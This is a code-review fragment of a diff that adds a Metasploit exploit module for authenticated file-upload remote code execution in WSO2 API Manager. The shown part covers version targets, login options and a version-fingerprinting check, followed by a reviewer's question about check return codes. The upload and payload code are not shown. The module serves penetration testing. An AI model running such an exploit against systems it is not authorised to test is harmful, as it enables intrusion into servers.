modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

```diff
@@ -0,0 +1,409 @@
+          ],
+          [
+            'WSO2 API Manager (3.1.0 - 4.0.0)', {
+              'min_version' => '3.1.0',
+              'max_version' => '4.0.0',
+              'api_version' => 'v2'
+            },
+          ],
+          [
+            'WSO2 API Manager (4.1.0)', {
+              'min_version' => '4.1.0',
+              'max_version' => '4.1.9',
+              'api_version' => 'v3'
+            }
+          ],
+          [
+            'WSO2 API Manager (4.2.0)', {
+              'min_version' => '4.2.0',
+              'max_version' => '4.2.9',
+              'api_version' => 'v4'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-05-31',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Relative URI of WSO2 API manager', '/']),
+        OptString.new('HttpUsername', [true, 'WSO2 API manager username', 'admin']),
+        OptString.new('HttpPassword', [true, 'WSO2 API manager password', ''])
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Checking target...')
+
+    authenticate
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'services', 'Version'),
+      'method' => 'GET',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+
+    return CheckCode::Unknown unless res&.code == 200 && res&.headers&.[]('Server') =~ /WSO2/
+
+    xml = res.get_xml_document
+    xml.at_xpath('//return').text.match(/WSO2 API Manager-((?:\d\.){2}(?:\d))$/)
+    version = Rex::Version.new ::Regexp.last_match(1)
+
+    return CheckCode::Unknown('Unable to determine version') unless version
+
+    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless version.between?(
+      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.0')
+    )
+
+    if target.name == 'Automatic'
+      # Find the target based on the detected version
+      selected_target_index = nil
+      targets.each_with_index do |t, idx|
+        if version.between?(Rex::Version.new(t.opts['min_version']), Rex::Version.new(t.opts['max_version']))
+          selected_target_index = idx
+          break
+        end
+      end
+
+      return CheckCode::Unknown('Unable to automatically select a target. You might need to set the target manually') unless selected_target_index
+
+      # Set the target
+      datastore['TARGET'] = selected_target_index
+      vprint_status("Automatically selected target: #{target.name} for version #{version}")
+    else
+      print_error("Mismatch between version found (#{version}) and module target version (#{target.name})") unless version.between?(
+        Rex::Version.new(target.opts['min_version']), Rex::Version.new(target.opts['max_version'])
+      )
```

Comment:
Should we return a CheckCode::Safe here if the version mismatch happens?
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes